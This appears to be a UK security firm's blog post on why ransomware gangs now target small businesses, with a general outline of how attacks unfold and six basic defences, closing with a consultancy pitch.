The SMB Ransomware Shift: Why Threat Actors Moved Downmarket

There's a phrase that keeps coming up in breach reports, insurer claim files, and intelligence briefings: “We didn't think we were a target.”

A 100-year-old UK logistics company said something similar before a single weak password let attackers encrypt their entire operation. They never recovered. Seven hundred people lost their jobs. The business closed.

That phrase is the most expensive assumption in UK business right now. The threat actors banking on it have built an entire industry around proving it wrong.

The economics behind the shift

For years, organised cybercrime groups focused on big game: banks, energy firms, government agencies, multinational supply chains. The payoff per hit was enormous. But the targets fought back. Large enterprises hired CISOs, built Security Operations Centres, deployed zero-trust architectures, and trained incident response teams that could contain a breach in hours.

Enterprise defences got expensive to crack. So the attackers did what any rational business does when margins shrink on premium products: they moved downmarket.

The maths works like this. A Fortune 500 company might pay a £4 million ransom, but it takes weeks of reconnaissance, custom tooling, and a team of specialists to breach one. A small accountancy firm or a regional logistics company might only pay £50,000 to £500,000, but with the right automation you can hit hundreds of them in a single campaign. The revenue per breach drops, but the volume more than compensates.

Forty-three per cent of all cyber attacks now target small organisations. UK SMBs lose an estimated £3.4 billion a year to inadequate cybersecurity. Since 2021, supply chain attacks involving SMEs have risen by over 400 per cent. This isn't a trend on the horizon. It already happened.

Ransomware is now a franchise operation

The enabler behind this pivot is a business model called Ransomware-as-a-Service, or RaaS. It works much like any franchise. A core group builds the malware, maintains the infrastructure, runs the extortion site, and handles ransom negotiations. Affiliates, the operators who actually break into networks and deploy the ransomware, sign up, execute attacks, and keep most of the revenue.

DragonForce, one of the most active RaaS gangs right now, offers affiliates 80 per cent of every ransom collected. The group provides the encryption malware, a public leak site for stolen data, and even a team that will phone and harass victims to pressure them into paying. Affiliates just need to find a way in.

Finding a way in has also been commoditised. A growing class of specialists called Initial Access Brokers do nothing but breach networks. They scan for vulnerabilities, exploit them, and sell that access to the highest bidder on criminal forums. One broker, one weak firewall, one ransomware affiliate, and a business that took twenty years to build can be locked up before anyone in the office notices.

LockBit dominated the RaaS market for several years until law enforcement disrupted it last year. Its affiliates didn't retire. They migrated to DragonForce and RansomHub. When RansomHub's infrastructure recently went dark, DragonForce moved to absorb their territory too. The names change. The volume of attacks doesn't.

Scattered Spider adds another layer. This English-speaking group partners with RaaS providers but brings its own speciality: social engineering. They're known for convincing help desks to reset credentials, manipulating staff over the phone, and targeting retail and professional services firms through human trust rather than technical exploits.

How the attacks actually work

A ransomware attack against an SME follows a predictable sequence. Every stage is a point where a basic control could have stopped the whole thing.

It starts with getting in. The three entry points haven't changed in years: a phishing email, an unpatched vulnerability in a firewall or VPN, or weak credentials. What has changed is scale. Attackers now use AI-driven scanning tools that sweep entire IP ranges looking for unpatched devices, exposed remote desktop services, login pages without multi-factor authentication. Your business doesn't need to be interesting to anyone. It just needs to have an open port.

Once inside, malware runs quietly. It maps the network, works out where the valuable data lives (financial records, client files, databases, HR records), and digs in so it survives a reboot.

Then it spreads. Using tools already built into Windows (PowerShell, remote management utilities), attackers escalate their privileges and move laterally through the network. Security teams call this “living off the land” because the attacker uses your own tools against you, which makes detection harder.

Before anything gets encrypted, automated scripts copy sensitive data out to servers the attackers control. This is the setup for double extortion: pay to unlock your files, and pay again to stop your data being published online. For professional services firms (accountants, solicitors, consultants), this is where the real damage sits. Client data on a public leak site is a reputational event that no amount of technical recovery fixes.

Then comes the encryption itself. AES or RSA across every file the attacker can reach. File extensions change. Systems stop working.

Finally, the ransom note. Pay in cryptocurrency within 72 hours or the price doubles. Refuse entirely and the stolen data goes public. Some groups now target ESXi and VMware infrastructure specifically, disabling virtualised environments to make restoring from standard backups much harder.

The whole sequence, from first click to full encryption, can run in hours. Most SMEs find out they've been attacked when staff arrive at the office to find locked screens and a ransom note.

What recovery actually costs

The ransom itself is usually the smallest line on the bill. Typical demands against SMEs range from tens of thousands to several hundred thousand pounds, sometimes calibrated to roughly 10 per cent of annual revenue.

The real cost is everything around it. Recovery for a typical SME involves roughly seven weeks of downtime. During that time, the business needs breach coaches, specialist legal counsel, IT forensics teams, threat negotiators, and forensic accountants to calculate business interruption losses. If personal data was compromised, the ICO expects notification within 72 hours. Customers, suppliers, and payment providers all need to be told.

Ninety-five per cent of SMB breaches trace back to human error. A clicked link. A reused password. A patch that was never applied. The breach that shuts down a business often starts with something so small that nobody remembers it happening.

Sixty per cent of small businesses that suffer a serious cyber attack don't survive to their six-month anniversary.

What actually stops them

Here's what's frustrating about all of this. The defences that would have prevented most of these attacks already exist. None of them are new. They just weren't implemented.

Multi-factor authentication is where we always start with clients, and for good reason. If an employee's password is leaked, phished, or guessed, MFA stops the attacker from using it. Doesn't matter how sophisticated the phishing was or how weak the password was. Without that second factor, the credential is useless. Enable it on everything: email, remote access, cloud platforms, admin consoles. And check that every user has actually completed enrolment. “Turned on” is not the same as “enforced.” We see that distinction trip people up more than anything else.

Then patching. Attackers scan for known vulnerabilities the same week patches are released. They know SMEs delay updates. The 14-day window that Cyber Essentials now mandates for critical patches is a reasonable minimum. Pay particular attention to perimeter devices (firewalls, VPN appliances, remote access gateways) because those are the first things attackers probe. And get rid of anything still running Windows 7 or XP. Those are open doors.

Backups done properly will save you even when everything else fails. The 3-2-1 rule: three copies of your data, on two different types of media, with one copy completely offline and disconnected from your network. If your backups are reachable from your network, the attacker will encrypt them too. An offline backup removes the attacker's leverage entirely. The ransom demand becomes irrelevant if you can restore from a clean copy they never touched.

Nobody should have admin rights on the account they use for email. If one account gets compromised, a least privilege model limits how far the attacker can move. You don't need enterprise-grade tooling for this. Just stop giving everyone the keys to everything.

When 95 per cent of breaches start with human error, staff training isn't optional. The phishing emails that worked five years ago, misspelled and obviously fake, have been replaced by AI-generated messages that are personalised, grammatically correct, and convincing enough to fool experienced professionals. Training has to keep pace with what is actually landing in inboxes.

And finally, write an incident response plan. Not a 50-page document. A one-page checklist. Who do you call first? How do you isolate the affected system? Where are the backup credentials stored? How do you notify the ICO? Who talks to customers? Working all of that out during a crisis, with your systems down, is how businesses make expensive mistakes. Working it out in advance costs nothing.

The supply chain question

One more thing that matters particularly for UK businesses.

Large enterprises and government bodies are tightening their supply chain security requirements. Cyber Essentials is already a standard filter for public sector procurement. Private sector primes are sending out security questionnaires that run to a hundred questions or more. If you're part of someone else's supply chain, your security posture is now their concern.

An SME that gets its security basics right isn't just protecting itself from ransomware. It can answer those supply chain questionnaires honestly. It can hold the Cyber Essentials badge. It can tell a prospective customer, with evidence, that working with them doesn't introduce risk. We've seen businesses win contracts specifically because the competitor couldn't demonstrate that.

The businesses that treat security as a cost to be minimised will find themselves losing contracts to businesses that treat it as a trust signal. That's already happening.

The bottom line

The threat actors have moved. They moved because the economics told them to. Enterprises got harder to crack, SMEs stayed soft, and the tooling to automate attacks against thousands of small businesses at once became cheap and accessible.

If you run a small business, automated tools are probing your public-facing infrastructure right now, looking for the unpatched firewall, the login page without MFA, the VPN appliance running last year's firmware. If they find something, the rest of the playbook runs itself.

The controls that stop it are within reach of any business willing to take them seriously. MFA, patching, offline backups, least privilege, staff awareness, a response plan. Six things. Most of them cost nothing beyond the time to implement them properly.

You're already being scanned. The only question is what they find.

Bluestone Cyber helps UK businesses assess their exposure to ransomware and implement the controls that actually matter. If you're not sure where your gaps are, get in touch. We'll tell you.